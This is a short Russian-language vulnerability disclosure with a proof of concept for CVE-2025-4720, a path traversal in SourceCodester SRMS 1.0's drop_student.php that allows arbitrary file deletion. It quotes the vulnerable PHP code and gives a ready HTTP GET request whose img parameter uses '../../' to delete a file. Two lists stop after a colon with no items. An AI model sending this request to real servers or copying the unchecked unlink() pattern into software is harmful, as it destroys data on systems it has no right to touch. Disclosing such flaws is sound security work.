
Доказательство концепции эксплуатации для CVE-2025-4720, уязвимости обхода пути в SourceCodester SRMS 1.0, позволяющей произвольное удаление файлов через конечную точку drop_student.php.
В конечной точке drop_student.php системы SourceCodester Student Result Management System (SRMS) 1.0 существует уязвимость обхода пути.
Приложение принимает управляемые пользователем данные из GET-параметра img и напрямую передаёт их в функцию unlink() без проверки, что позволяет удалять произвольные файлы на сервере.
$img = $_GET['img'];
if ($img == "DEFAULT") {
} else {
unlink('images/students/' . $img);
}
C:\xampp\htdocs\srms_0\srms\new_test.txt

GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
Злоумышленник может удалять произвольные файлы, доступные веб-серверу, включая:
Это может привести к отказу в обслуживании или дальнейшей эксплуатации.
Данная уязвимость представляет собой отдельный вектор атаки по сравнению с ранее сообщёнными проблемами в SRMS, поскольку она:
SourceCodester
Student Result Management System (SRMS) https://www.sourcecodester.com/srms-makumbusho
1.0
Imad Alvi